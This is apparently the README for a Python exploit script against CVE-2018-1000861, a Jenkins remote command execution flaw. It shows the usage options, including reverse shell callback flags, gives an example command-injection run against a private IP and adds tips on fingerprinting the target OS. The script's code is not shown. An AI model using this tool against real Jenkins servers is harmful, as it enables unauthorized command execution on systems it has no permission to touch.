Simple script to exploit CVE-2018-1000861, written in Python 3
usage: exploit.py [-h] -u URL [-c CMD] [-r] [-i IP] [-p PORT] [-v]

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target Jenkins server
  -c CMD, --cmd CMD     Command to execute
  -r, --revshell        Execute reverse shell
  -i IP, --ip IP        IP address for reverse shell callback
  -p PORT, --port PORT  Port for reverse shell callback
  -v, --verbose         Verbose output

python exploit.py -u http://192.168.1.20 -c 'ping 192.168.1.10'
- This tool does not attempt to verify the target is vulnerable. All it does is shove a shell command into a Java class.
- Shell commands executed will not return output. You'll need to either have a method of verifying that the command executed (e.g. ping + tcpdump) or use a reverse shell
- This vulnerability affects both Linux and Windows installs of Jenkins where the . You should attempt to verify the target OS prior to executing this (such as through ICMP TTL or available services)
- The script should work for both Linux and Windows
- The reverse shell module (-r, -i, -p options) isn't implemented
- Use responsibly
- Platform specific reverse shell modules
- Vuln identification
- Verbosity with vuln identification